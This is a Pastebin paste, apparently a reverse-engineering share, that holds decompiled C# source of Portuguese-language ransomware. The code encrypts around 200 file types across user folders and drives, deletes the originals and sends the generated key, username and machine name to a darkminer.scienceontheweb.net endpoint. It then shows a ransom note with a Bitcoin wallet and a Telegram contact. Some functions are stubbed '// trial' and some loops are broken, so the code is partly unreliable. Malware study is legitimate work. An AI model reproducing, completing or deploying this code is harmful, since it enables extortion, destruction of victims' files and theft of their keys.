Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Malware BR:
- https://www.virustotal.com/pt/file/576415db352356b31c487bf5fb29f406cf37bcd1ed6b00f2004e9cca5e9e5c40/analysis/
- Malware Reverse:
- using System;
- using System.ComponentModel;
- using System.Diagnostics;
- using System.Drawing;
- using System.IO;
- using System.Security.Cryptography;
- using System.Text;
- using System.Windows.Forms;
- namespace Instalador
- {
- public class frmInstalador : Form
- {
- private Button button1;
- private Button button2;
- private IContainer components;
- private ErrorProvider errorProvider1;
- private Label label1;
- private Label label2;
- private Label label3;
- private Label label4;
- private Label label5;
- private Label label6;
- private Label label7;
- private LinkLabel linkLabel1;
- private Panel panel1;
- private Panel panel2;
- private string pcn;
- private PictureBox pictureBox1;
- private ProgressBar progressBar1;
- private ProgressBar progressBar2;
- private TextBox textBox1;
- private TextBox textBox2;
- private int totalFile;
- private string us;
- public frmInstalador()
- {
- us = Environment.UserName;
- pcn = Environment.MachineName.ToString();
- totalFile = 0;
- components = null;
- InitializeComponent();
- }
- private void button1_Click(object sender, EventArgs e)
- {
- // trial
- }
- private void button2_Click(object sender, EventArgs e)
- {
- // trial
- }
- private void d(string inputFile, string _key)
- {
- // trial
- }
- public void dd(string location, string key)
- {
- bool flag2, flag3;
- try
- {
- string[] sArr1 = Directory.GetFiles(location);
- string[] sArr2 = Directory.GetDirectories(location);
- int i1 = 0;
- while (flag2)
- {
- Show();
- Refresh();
- Application.DoEvents();
- try
- {
- string s = Path.GetExtension(sArr1[i1]);
- bool flag1 = Path.GetExtension(sArr1[i1]) == ".qwerty";
- if (flag1)
- d(sArr1[i1], key);
- }
- catch
- {
- }
- i1++;
- flag2 = i1 < sArr1.Length;
- }
- int i2 = 0;
- while (flag3)
- {
- try
- {
- dd(sArr2[i2], key);
- }
- catch
- {
- }
- i2++;
- flag3 = i2 < sArr2.Length;
- }
- }
- catch (Exception e)
- {
- }
- }
- private void e(string inputFile, string _key)
- {
- bool flag2, flag3;
- int i1;
- try
- {
- bool flag1 = !File.Exists(inputFile);
- if (flag1)
- return;
- string s1 = inputFile + ".qwerty";
- UnicodeEncoding unicodeEncoding = new UnicodeEncoding();
- byte[] bArr1 = unicodeEncoding.GetBytes(_key);
- byte[] bArr2 = unicodeEncoding.GetBytes(gi());
- int i2 = 0;
- while (flag2)
- {
- bArr1 = SHA256.Create().ComputeHash(bArr1);
- i2++;
- flag2 = i2 < 10;
- }
- string s2 = s1;
- FileStream fileStream1 = new FileStream(s2, FileMode.Create);
- RijndaelManaged rijndaelManaged = new RijndaelManaged();
- CryptoStream cryptoStream = new CryptoStream(fileStream1, rijndaelManaged.CreateEncryptor(bArr1, bArr2), CryptoStreamMode.Write);
- FileStream fileStream2 = new FileStream(inputFile, FileMode.Open);
- while (flag3)
- {
- cryptoStream.WriteByte((byte)i1);
- i1 = fileStream2.ReadByte();
- flag3 = fileStream2.ReadByte() != -1;
- }
- fileStream2.Close();
- cryptoStream.Close();
- fileStream1.Close();
- File.Delete(inputFile);
- totalFile++;
- }
- catch (Exception e)
- {
- }
- }
- public void ed(string location, string key)
- {
- bool flag3, flag4, flag5;
- try
- {
- new string[201][0] = ".cs";
- new string[201][1] = ".txt";
- new string[201][2] = ".doc";
- new string[201][3] = ".docx";
- new string[201][4] = ".xls";
- new string[201][5] = ".xlsx";
- new string[201][6] = ".ppt";
- new string[201][7] = ".pptx";
- new string[201][8] = ".odt";
- new string[201][9] = "jpeg";
- new string[201][10] = ".png";
- new string[201][11] = ".csv";
- new string[201][12] = ".sql";
- new string[201][13] = ".mdb";
- new string[201][14] = ".sln";
- new string[201][15] = ".php";
- new string[201][16] = ".asp";
- new string[201][17] = ".aspx";
- new string[201][18] = ".html";
- new string[201][19] = ".xml";
- new string[201][20] = ".psd";
- new string[201][21] = ".sql";
- new string[201][22] = ".mp4";
- new string[201][23] = ".mp3";
- new string[201][24] = ".7z";
- new string[201][25] = ".rar";
- new string[201][26] = ".m4a";
- new string[201][27] = ".wma";
- new string[201][28] = ".avi";
- new string[201][29] = ".wmv";
- new string[201][30] = ".csv";
- new string[201][31] = ".zip";
- new string[201][32] = ".sie";
- new string[201][33] = ".sum";
- new string[201][34] = ".ibank";
- new string[201][35] = ".t13";
- new string[201][36] = ".t12";
- new string[201][37] = ".qdf";
- new string[201][38] = ".gdb";
- new string[201][39] = ".tax";
- new string[201][40] = ".pkpass";
- new string[201][41] = ".bc6";
- new string[201][42] = ".bc7";
- new string[201][43] = ".bkp";
- new string[201][44] = ".qic";
- new string[201][45] = ".bkf";
- new string[201][46] = ".sidn";
- new string[201][47] = ".sidd";
- new string[201][48] = ".mddata";
- new string[201][49] = ".itl";
- new string[201][50] = ".itdb";
- new string[201][51] = ".icxs";
- new string[201][52] = ".hvpl";
- new string[201][53] = ".hplg";
- new string[201][54] = ".hkdb";
- new string[201][55] = ".mdbackup";
- new string[201][56] = ".syncdb";
- new string[201][57] = ".gho";
- new string[201][58] = ".cas";
- new string[201][59] = ".svg";
- new string[201][60] = ".map";
- new string[201][61] = ".wmo";
- new string[201][62] = ".itm";
- new string[201][63] = ".sb";
- new string[201][64] = ".fos";
- new string[201][65] = ".mov";
- new string[201][66] = ".vdf";
- new string[201][67] = ".ztmp";
- new string[201][68] = ".sis";
- new string[201][69] = ".sid";
- new string[201][70] = ".ncf";
- new string[201][71] = ".menu";
- new string[201][72] = ".layout";
- new string[201][73] = ".dmp";
- new string[201][74] = ".blob";
- new string[201][75] = ".esm";
- new string[201][76] = ".vcf";
- new string[201][77] = ".vtf";
- new string[201][78] = ".dazip";
- new string[201][79] = ".fpk";
- new string[201][80] = ".mlx";
- new string[201][81] = ".kf";
- new string[201][82] = ".iwd";
- new string[201][83] = ".vpk";
- new string[201][84] = ".tor";
- new string[201][85] = ".psk";
- new string[201][86] = ".rim";
- new string[201][87] = ".w3x";
- new string[201][88] = ".fsh";
- new string[201][89] = ".ntl";
- new string[201][90] = ".arch00";
- new string[201][91] = ".lvl";
- new string[201][92] = ".snx";
- new string[201][93] = ".cfr";
- new string[201][94] = ".ff";
- new string[201][95] = ".vpp_pc";
- new string[201][96] = ".lrf";
- new string[201][97] = ".m2";
- new string[201][98] = ".mcmeta";
- new string[201][99] = ".vfs0";
- new string[201][100] = ".mpqge";
- new string[201][101] = ".kdb";
- new string[201][102] = ".db0";
- new string[201][103] = ".dba";
- new string[201][104] = ".rofl";
- new string[201][105] = ".hkx";
- new string[201][106] = ".bar";
- new string[201][107] = ".upk";
- new string[201][108] = ".das";
- new string[201][109] = ".iwi";
- new string[201][110] = ".litemod";
- new string[201][111] = ".asset";
- new string[201][112] = ".forge";
- new string[201][113] = ".ltx";
- new string[201][114] = ".bsa";
- new string[201][115] = ".apk";
- new string[201][116] = ".re4";
- new string[201][117] = ".sav";
- new string[201][118] = ".lbf";
- new string[201][119] = ".slm";
- new string[201][120] = ".bik";
- new string[201][121] = ".epk";
- new string[201][122] = ".rgss3a";
- new string[201][123] = ".pak";
- new string[201][124] = ".big";
- new string[201][125] = "wallet";
- new string[201][126] = ".wotreplay";
- new string[201][127] = ".xxx";
- new string[201][128] = ".desc";
- new string[201][129] = ".py";
- new string[201][130] = ".m3u";
- new string[201][131] = ".flv";
- new string[201][132] = ".js";
- new string[201][133] = ".css";
- new string[201][134] = ".pk7";
- new string[201][135] = ".p7b";
- new string[201][136] = ".p12";
- new string[201][137] = ".pfx";
- new string[201][138] = ".pem";
- new string[201][139] = ".crt";
- new string[201][140] = ".cer";
- new string[201][141] = ".der";
- new string[201][142] = ".x3f";
- new string[201][143] = ".srw";
- new string[201][144] = ".pef";
- new string[201][145] = ".ptx";
- new string[201][146] = ".r3d";
- new string[201][147] = ".rw2";
- new string[201][148] = ".rwl";
- new string[201][149] = ".raw";
- new string[201][150] = ".raf";
- new string[201][151] = ".orf";
- new string[201][152] = ".nrw";
- new string[201][153] = ".mrwref";
- new string[201][154] = ".mef";
- new string[201][155] = ".erf";
- new string[201][156] = ".kdc";
- new string[201][157] = ".dcr";
- new string[201][158] = ".cr2";
- new string[201][159] = ".crw";
- new string[201][160] = ".bay";
- new string[201][161] = ".sr2";
- new string[201][162] = ".srf";
- new string[201][163] = ".arw";
- new string[201][164] = ".3fr";
- new string[201][165] = ".dng";
- new string[201][166] = ".jpe";
- new string[201][167] = ".jpg";
- new string[201][168] = ".cdr";
- new string[201][169] = ".indd";
- new string[201][170] = ".ai";
- new string[201][171] = ".eps";
- new string[201][172] = ".pdf";
- new string[201][173] = ".pdd";
- new string[201][174] = ".dbf";
- new string[201][175] = ".mdf";
- new string[201][176] = ".wb2";
- new string[201][177] = ".rtf";
- new string[201][178] = ".wpd";
- new string[201][179] = ".dxg";
- new string[201][180] = ".pst";
- new string[201][181] = ".accdb";
- new string[201][182] = ".mdb";
- new string[201][183] = ".pptm";
- new string[201][184] = ".pptx";
- new string[201][185] = ".ppt";
- new string[201][186] = ".xlk";
- new string[201][187] = ".xlsb";
- new string[201][188] = ".xlsm";
- new string[201][189] = ".xlsx";
- new string[201][190] = ".xls";
- new string[201][191] = ".wps";
- new string[201][192] = ".docm";
- new string[201][193] = ".docx";
- new string[201][194] = ".doc";
- new string[201][195] = ".odb";
- new string[201][196] = ".odc";
- new string[201][197] = ".odm";
- new string[201][198] = ".odp";
- new string[201][199] = ".ods";
- new string[201][200] = ".odt";
- string[] sArr1 = new string[201];
- string[] sArr2 = Directory.GetFiles(location);
- string[] sArr3 = Directory.GetDirectories(location);
- int i1 = 0;
- while (flag4)
- {
- Show();
- Refresh();
- Application.DoEvents();
- try
- {
- string s = Path.GetExtension(sArr2[i1]);
- int i2 = 0;
- while (flag3)
- {
- bool flag1 = sArr1[i2].IndexOf(s) >= 0;
- if (flag1)
- {
- bool flag2 = Path.GetExtension(sArr2[i1]) != ".qwerty";
- if (flag2)
- e(sArr2[i1], key);
- }
- i2++;
- flag3 = i2 < sArr1.Length;
- }
- }
- catch
- {
- }
- i1++;
- flag4 = i1 < sArr2.Length;
- }
- int i3 = 0;
- while (flag5)
- {
- try
- {
- ed(sArr3[i3], key);
- }
- catch
- {
- }
- i3++;
- flag5 = i3 < sArr3.Length;
- }
- }
- catch (Exception e)
- {
- }
- }
- private void frmInstalador_Load(object sender, EventArgs e)
- {
- Show();
- Refresh();
- Application.DoEvents();
- m();
- }
- private string gi()
- {
- // trial
- return null;
- }
- private void InitializeComponent()
- {
- components = new Container();
- ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(frmInstalador));
- panel1 = new Panel();
- pictureBox1 = new PictureBox();
- button2 = new Button();
- label7 = new Label();
- label6 = new Label();
- textBox2 = new TextBox();
- label5 = new Label();
- panel2 = new Panel();
- progressBar2 = new ProgressBar();
- label4 = new Label();
- button1 = new Button();
- textBox1 = new TextBox();
- label1 = new Label();
- label2 = new Label();
- progressBar1 = new ProgressBar();
- label3 = new Label();
- errorProvider1 = new ErrorProvider(components);
- linkLabel1 = new LinkLabel();
- panel1.SuspendLayout();
- pictureBox1.BeginInit();
- panel2.SuspendLayout();
- errorProvider1.BeginInit();
- SuspendLayout();
- panel1.Controls.Add(pictureBox1);
- panel1.Controls.Add(button2);
- panel1.Controls.Add(label7);
- panel1.Controls.Add(label6);
- panel1.Controls.Add(linkLabel1);
- panel1.Controls.Add(textBox2);
- panel1.Controls.Add(label5);
- panel1.Controls.Add(panel2);
- panel1.Controls.Add(button1);
- panel1.Controls.Add(textBox1);
- panel1.Controls.Add(label1);
- panel1.Location = new Point(0, 3);
- panel1.Name = "panel1";
- panel1.Size = new Size(628, 453);
- panel1.TabIndex = 0;
- panel1.Visible = false;
- pictureBox1.Image = (Image)componentResourceManager.GetObject("pictureBox1.Image");
- pictureBox1.Location = new Point(3, 226);
- pictureBox1.Name = "pictureBox1";
- pictureBox1.Size = new Size(245, 132);
- pictureBox1.SizeMode = PictureBoxSizeMode.StretchImage;
- pictureBox1.TabIndex = 10;
- pictureBox1.TabStop = false;
- button2.Location = new Point(566, 259);
- button2.Name = "button2";
- button2.Size = new Size(51, 21);
- button2.TabIndex = 9;
- button2.Text = "Copiar";
- button2.UseVisualStyleBackColor = true;
- button2.Click += new EventHandler(button2_Click);
- label7.AutoSize = true;
- label7.Font = new Font("Microsoft Sans Serif", 8.25F, FontStyle.Bold, GraphicsUnit.Point, 0);
- label7.Location = new Point(277, 245);
- label7.Name = "label7";
- label7.Size = new Size(344, 13);
- label7.TabIndex = 8;
- label7.Text = "Carteira Bitcoin: 15tGsTDLMztrxP1kCoKPBTaBgv1xCKRtkY";
- label6.AutoSize = true;
- label6.Location = new Point(251, 339);
- label6.Name = "label6";
- label6.Size = new Size(54, 13);
- label6.TabIndex = 7;
- label6.Text = "Telegram:";
- textBox2.Location = new Point(3, 36);
- textBox2.Multiline = true;
- textBox2.Name = "textBox2";
- textBox2.Size = new Size(620, 188);
- textBox2.TabIndex = 5;
- textBox2.Text = componentResourceManager.GetString("textBox2.Text");
- label5.AutoSize = true;
- label5.Font = new Font("Microsoft Sans Serif", 16.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label5.ForeColor = Color.DarkRed;
- label5.Location = new Point(33, 8);
- label5.Name = "label5";
- label5.Size = new Size(562, 26);
- label5.TabIndex = 4;
- label5.Text = "ATEN\u00C7\u00C3O! Todos os seus arquivos foram sequestrados!";
- panel2.Controls.Add(progressBar2);
- panel2.Controls.Add(label4);
- panel2.Location = new Point(3, 358);
- panel2.Name = "panel2";
- panel2.Size = new Size(620, 94);
- panel2.TabIndex = 3;
- panel2.Visible = false;
- progressBar2.Location = new Point(218, 73);
- progressBar2.Name = "progressBar2";
- progressBar2.Size = new Size(388, 18);
- progressBar2.Style = ProgressBarStyle.Marquee;
- progressBar2.TabIndex = 1;
- label4.AutoSize = true;
- label4.Font = new Font("Microsoft Sans Serif", 12.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label4.Location = new Point(9, 11);
- label4.Name = "label4";
- label4.Size = new Size(409, 80);
- label4.TabIndex = 0;
- label4.Text = "Estamos agora tirando a criptografia dos seus arquivos...\r\nPor favor n\u00E3o feche esse programa!\r\nEsse processo pode demorar v\u00E1rios minutos!\r\nAvisaremos quando acabar!\r\n";
- button1.Location = new Point(475, 333);
- button1.Name = "button1";
- button1.Size = new Size(148, 23);
- button1.TabIndex = 2;
- button1.Text = "Desbloquear meus arquivos";
- button1.UseVisualStyleBackColor = true;
- button1.Click += new EventHandler(button1_Click);
- textBox1.Location = new Point(250, 292);
- textBox1.Multiline = true;
- textBox1.Name = "textBox1";
- textBox1.Size = new Size(367, 39);
- textBox1.TabIndex = 1;
- label1.AutoSize = true;
- label1.Font = new Font("Microsoft Sans Serif", 8.25F, FontStyle.Bold, GraphicsUnit.Point, 0);
- label1.Location = new Point(247, 276);
- label1.Name = "label1";
- label1.Size = new Size(112, 13);
- label1.TabIndex = 0;
- label1.Text = "Digite o password:";
- label2.AutoSize = true;
- label2.Font = new Font("Microsoft Sans Serif", 30.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label2.Location = new Point(131, 58);
- label2.Name = "label2";
- label2.Size = new Size(371, 46);
- label2.TabIndex = 1;
- label2.Text = "Por favor aguarde...";
- progressBar1.Location = new Point(25, 143);
- progressBar1.Name = "progressBar1";
- progressBar1.Size = new Size(598, 23);
- progressBar1.Style = ProgressBarStyle.Marquee;
- progressBar1.TabIndex = 2;
- label3.AutoSize = true;
- label3.Font = new Font("Microsoft Sans Serif", 20.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- label3.Location = new Point(6, 104);
- label3.Name = "label3";
- label3.Size = new Size(626, 31);
- label3.TabIndex = 3;
- label3.Text = "Verificando comunica\u00E7\u00E3o com nossos servidores...";
- errorProvider1.ContainerControl = this;
- linkLabel1.AutoSize = true;
- linkLabel1.Font = new Font("Microsoft Sans Serif", 12.0F, FontStyle.Regular, GraphicsUnit.Point, 0);
- linkLabel1.Location = new Point(322, 334);
- linkLabel1.Name = "linkLabel1";
- linkLabel1.Size = new Size(0, 20);
- linkLabel1.TabIndex = 6;
- AutoScaleDimensions = new SizeF(6.0F, 13.0F);
- AutoScaleMode = AutoScaleMode.Font;
- ClientSize = new Size(635, 461);
- Controls.Add(panel1);
- Controls.Add(label3);
- Controls.Add(progressBar1);
- Controls.Add(label2);
- Name = "frmInstalador";
- StartPosition = FormStartPosition.CenterScreen;
- Text = "Aguarde...";
- TopMost = true;
- Load += new EventHandler(frmInstalador_Load);
- panel1.ResumeLayout(false);
- panel1.PerformLayout();
- pictureBox1.EndInit();
- panel2.ResumeLayout(false);
- panel2.PerformLayout();
- errorProvider1.EndInit();
- ResumeLayout(false);
- PerformLayout();
- }
- private void linkLabel1_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
- {
- Process.Start("http://t.me/@rodolfoanubis");
- }
- private void m()
- {
- try
- {
- bool flag = !File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\qwerty");
- if (flag)
- {
- File.Create(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\qwerty");
- Show();
- Refresh();
- Application.DoEvents();
- panel1.Visible = false;
- string s = frmInstalador.cp(2048);
- new string[8][0] = "http://darkminer.scienceontheweb.net/make.php?info=KEY ";
- DateTime dateTime = DateTime.Now;
- new string[8][1] = dateTime.ToString("ddMMyy HHmmss");
- new string[8][2] = " - ";
- new string[8][3] = us;
- new string[8][4] = " | ";
- new string[8][5] = pcn;
- new string[8][6] = " | ";
- new string[8][7] = s;
- frmInstalador.get(String.Concat(new string[8]));
- linkLabel1.Text = frmInstalador.get("http://darkminer.scienceontheweb.net/t.txt");
- ed("C:\\Users\\" + us + "\\", s);
- ed("D:\\", s);
- ed("E:\\", s);
- ed("F:\\", s);
- ed("G:\\", s);
- ed("H:\\", s);
- ed("I:\\", s);
- ed("J:\\", s);
- ed("K:\\", s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Desktop), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Personal), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.MyMusic), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Personal), s);
- ed(Environment.GetFolderPath(Environment.SpecialFolder.Recent), s);
- new object[4][0] = "http://darkminer.scienceontheweb.net/make.php?info=INFO ";
- dateTime = DateTime.Now;
- new object[4][1] = dateTime.ToString("ddMMyy HHmmss");
- new object[4][2] = " Total Files ";
- new object[4][3] = totalFile;
- frmInstalador.get(String.Concat(new object[4]));
- }
- panel1.Visible = true;
- }
- catch
- {
- }
- }
- protected override void Dispose(bool disposing)
- {
- // trial
- }
- public static string cp(int length)
- {
- bool flag;
- StringBuilder stringBuilder = new StringBuilder();
- RNGCryptoServiceProvider rngcryptoServiceProvider = new RNGCryptoServiceProvider();
- while (flag)
- {
- stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"[frmInstalador.gi(rngcryptoServiceProvider, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890".Length)]);
- flag = length-- > 0;
- }
- return stringBuilder.ToString();
- }
- public static string get(string url)
- {
- // trial
- return null;
- }
- public static int gi(RNGCryptoServiceProvider rnd, int max)
- {
- // trial
- return 0;
- }
- } // class frmInstalador
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement